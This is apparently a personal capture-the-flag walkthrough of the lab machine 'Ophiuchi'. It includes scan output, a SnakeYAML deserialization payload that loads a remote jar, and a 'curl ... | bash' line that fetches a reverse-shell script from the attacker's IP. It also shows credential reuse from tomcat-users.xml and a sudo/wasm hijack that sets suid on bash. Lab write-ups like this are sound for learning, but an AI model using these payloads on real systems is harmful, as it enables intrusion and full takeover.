Machine Ophiuchi - Medium - Linux
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
8080/tcp open http-proxy syn-ack ttl 63
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
| 256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_ 256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open http Apache Tomcat 9.0.38
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- fuzz
- test/ → shows is a Tomcat/9.0.38
- admin/ → tomcat admin
- google yaml injection, lot of hits on snake library that has a vulnerability
- using this payload
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["10.10.14.6:8000"]
]]
]
a big 500 error page shows,
Can't construct a java object for tag:yaml.org,2002:java.net.URL; exception=java.lang.reflect.InvocationTargetException
in 'string', line 3, column 5:
!!java.net.URL ["10.10.14.6:8000"]
and shows that is crashing the snake library! we are in good track
exploit yaml parsing (java snake)
let’s clone https://github.com/artsploit/yaml-payload
modify to execute Runtime.getRuntime().exec("curl http://10.10.14.6:8000/script.sh | bash");
compile to generate the class and the jar as the readme says
create a script.sh with the bash reverse shell
now we can use the payload to execute things in the machine
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.6:8000/yaml-payload.jar"]
]]
]
and failed cause my java compiler is too new? java.lang.UnsupportedClassVersionError: artsploit/AwesomeScriptEngineFactory has been compiled by a more recent version of the Java Runtime
using sdkman, I installed java8…
recompile… and seems that it worked, but I didn’t get the reverse shell…
but I saw that the jar and the script.sh was requested
Yeeey! I have a shell as tomcat
from tomcat to admin
checked the tomcat-users.xml and found a password for admin password="whythereisalimit"
let’s try to ssh it… yey! we are admin!
from admin to …
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on ophiuchi:
(ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go
cool, that a bit more tricky… to make it work we have to modify a main.wasm so we have to understand it and change the value it returns
reverse engineer a wasm
with wasm-decompile we can see the real code
export memory memory(initial: 16, max: 0);
global g_a:int = 1048576;
export global data_end:int = 1048576;
export global heap_base:int = 1048576;
table T_a:funcref(min: 1, max: 1);
export function info():int {
return 0
}
not let’s see if we can do something similarfind
in my computer I did another wasm that returns a value of 1 (to pass the condition) → making it to execute a bash script I could hijack (executing in another directory)
with that give suid to /bin/bash and finished!